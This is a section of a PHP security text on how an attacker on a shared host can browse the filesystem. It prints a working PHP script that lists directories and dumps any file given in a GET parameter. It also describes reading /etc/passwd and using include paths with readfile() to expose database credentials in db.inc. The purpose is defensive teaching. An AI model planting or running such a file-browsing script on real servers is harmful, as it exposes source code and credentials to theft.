8.4. Filesystem Browsing
In addition to being able to read arbitrary files on a shared host, an attacker can also create a script that browses the filesystem. This type of script can be used to discover the location of your source code because your most sensitive files are not likely to be stored within document root. An example of such a script follows:
<pre>
<?php
if (isset($_GET['dir']))
{
ls($_GET['dir']);
}
elseif (isset($_GET['file']))
{
cat($_GET['file']);
}
else
{
ls('/');
}
function cat($file)
{
echo htmlentities(file_get_contents($file), ENT_QUOTES, 'UTF-8'));
}
function ls($dir)
{
$handle = dir($dir);
while ($filename = $handle->read())
{
$size = filesize("$dir$filename");
if (is_dir("$dir$filename"))
{
$type = 'dir';
$filename .= '/';
}
else
{
$type = 'file';
}
if (is_readable("$dir$filename"))
{
$line = str_pad($size, 15);
$line .= "<a href=\"{$_SERVER['PHP_SELF']}";
$line .= "?$type=$dir$filename\">$filename</a>";
}
else
{
$line = str_pad($size, 15);
$line .= $filename;
}
echo "$line\n";
}
$handle->close();
}
?>
</pre>
An attacker might first view /etc/passwd or a directory listing of /home to get a list of usernames on the server. It is then trivial to browse a user's source code within the user's document root; the location of source code stored outside of the user's document root is revealed by language constructs such as include and require. For example, consider discovering the following script at /home/victim/public_html/admin.php:
<?php
include '../inc/db.inc';
/* ... */
?>
If an attacker manages to view the source of this file, the exact loction of db.inc is discovered, and the attacker can use readfile( ) to expose the contents, revealing the database access credentials. Thus, the fact that db.inc is stored outside of document root offers subpar protection in this environment.
This particular attack illustrates why you should consider all source code on a shared server to be public, opting to store all sensitive data in a database.
| 